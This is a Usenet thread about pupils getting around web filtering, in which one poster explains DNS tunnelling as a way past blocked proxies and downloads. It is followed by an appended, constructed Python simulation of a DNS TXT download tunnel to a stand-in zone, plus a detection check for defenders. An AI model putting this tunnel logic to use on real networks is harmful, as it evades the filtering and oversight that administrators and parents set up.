Re: Kids bypassing firewall via web proxy sites



E. wrote:
Sebastian Gottschalk wrote:
E. wrote:
How would you establish communications to a blocked site when
proxies are also blocked?

DNS

So you can resolve the IP using a UDP packet.

If I control the authoritative DNS server for the domain I'm trying to
resolve it's up to me what content is inside the DNS request/reply.
Besides, for DNS you need TCP as well (no, not only for zone transfers).

How do you propose to get a two-way connection going using UDP 53,
and browsing myspace using this?

Send/poll from the client side. Please have a look at the "wwwsh"
section of [1]. We didn't use DNS there, but I suppose you'll get the
idea.

Would standard client-side computer policy allow the user access to
use/install the tools needed to do this?

That's the point: Modern policies can prohibit _running_ such tools,
at least to a certain level. Not so reliable, but pretty effective.

That's why being able to download such utilities, besides
circumventing the policies, is no big problem.

As already stated, all downloads are blocked. Sending a UDP packet
does not equal a downloaded utility.

You are not limited to one UDP packet. And of course it's no problem to
encapsulate the download in DNS replies and re-assemble the file on the
client side.

[1] http://copton.net/Personal_Firewalls/ccc-vortrag-en.html

cu
59cobalt
--
"If you think technology can solve your security problems, then you
don't understand the problems and you don't understand the technology."
--Bruce Schneier
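The send/poll scheme and the chunked download re-assembled from DNS replies that the post above describes, worked through as an added example; this is not code from the thread or from the linked talk. The zone tunnel.example, the session label f00d, the 120-byte chunk size, the use of TXT records as the carrier and the sample payload are all assumptions made for the example. Client and server exchange raw DNS wire-format messages in-process, so it runs offline without touching a socket or a firewall. The last function is the defender-side check a practitioner would want next to this: a tunnel burns one never-repeated name per chunk under a single zone, which stands out against ordinary browsing that repeats a handful of names.

```python
"""
Offline simulation of a DNS download tunnel (constructed example).

The client polls 0.f00d.tunnel.example, 1.f00d.tunnel.example, ... with TXT
queries; the authoritative server for the (assumed) zone returns one base64
chunk of the payload per reply and an empty TXT once the payload is exhausted.
"""
import base64
import struct
from collections import defaultdict

ZONE = ["tunnel", "example"]   # assumed attacker-controlled zone (hypothetical)
CHUNK = 120                    # payload bytes per reply; base64 -> 160 chars, fits one TXT string
# Constructed stand-in for the blocked utility the client wants to fetch.
PAYLOAD = bytes(range(256)) * 3 + b"-- end of tool --"


def encode_name(labels):
    """Wire-format a name: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(msg, off):
    """Inverse of encode_name; returns (labels, offset just past the name)."""
    labels = []
    while msg[off]:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return labels, off + 1


def build_query(labels, qid):
    """Standard query: RD set, one question, QTYPE=TXT (16), QCLASS=IN (1)."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(labels) + struct.pack("!HH", 16, 1)


def build_reply(query, txt):
    """Answer with one TXT record; owner name compressed to the question (0xC00C)."""
    qid = struct.unpack("!H", query[:2])[0]
    _, end = decode_name(query, 12)
    question = query[12:end + 4]                               # name + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA, NOERROR
    rdata = bytes([len(txt)]) + txt                            # TXT: one <character-string>
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 16, 1, 60, len(rdata)) + rdata
    return header + question + answer


def parse_reply(reply):
    """Return (qid, question labels, TXT bytes or None) from a single-answer reply."""
    qid, _flags, _qd, ancount = struct.unpack("!HHHH", reply[:8])
    labels, off = decode_name(reply, 12)
    off += 4                                                   # QTYPE, QCLASS
    if ancount == 0:
        return qid, labels, None
    off += 2                                                   # compression pointer
    _, _, _, rdlen = struct.unpack("!HHIH", reply[off:off + 10])
    off += 10
    rdata = reply[off:off + rdlen]
    return qid, labels, rdata[1:1 + rdata[0]]


def tunnel_server(query, payload=PAYLOAD):
    """Authoritative side: leftmost label is the chunk index; past the end, an empty TXT."""
    labels, _ = decode_name(query, 12)
    if labels[-2:] != ZONE or not labels[0].isdigit():
        return build_reply(query, b"")      # a real server would say NXDOMAIN; kept short here
    seq = int(labels[0])
    return build_reply(query, base64.b64encode(payload[seq * CHUNK:(seq + 1) * CHUNK]))


def tunnel_client(session, resolve=tunnel_server):
    """Send/poll loop: request chunk 0, 1, 2, ... until the server returns an empty TXT."""
    parts, names, seq = {}, [], 0
    while True:
        name = [str(seq), session] + ZONE
        names.append(".".join(name))
        qid, qname, txt = parse_reply(resolve(build_query(name, seq & 0xFFFF)))
        if qid != seq & 0xFFFF or qname != name:
            raise ValueError("reply does not match the outstanding poll")
        if not txt:
            break
        parts[seq] = base64.b64decode(txt)
        seq += 1
    return b"".join(parts[i] for i in sorted(parts)), names


def unique_names_per_zone(qnames):
    """Defender-side check: count distinct query names per two-label zone.
    The tunnel above yields one new name per chunk; normal browsing repeats names."""
    seen = defaultdict(set)
    for q in qnames:
        labels = q.split(".")
        seen[".".join(labels[-2:])].add(q)
    return {zone: len(names) for zone, names in seen.items()}


if __name__ == "__main__":
    data, polled = tunnel_client("f00d")
    print("reassembled", len(data), "bytes in", len(polled), "polls; intact:", data == PAYLOAD)
    # Constructed resolver log: the tunnel's polls mixed with repeated ordinary lookups.
    print(unique_names_per_zone(polled + ["www.example.com"] * 20))
```

With the 785-byte sample payload the client needs seven data polls plus one that comes back empty, so the zone shows eight distinct names where the ordinary lookups show one. A resolver log with that shape (many unique names under one zone, each seen exactly once) is the signal to alert on; blocking UDP 53 outright is not an option, which is the point the thread makes.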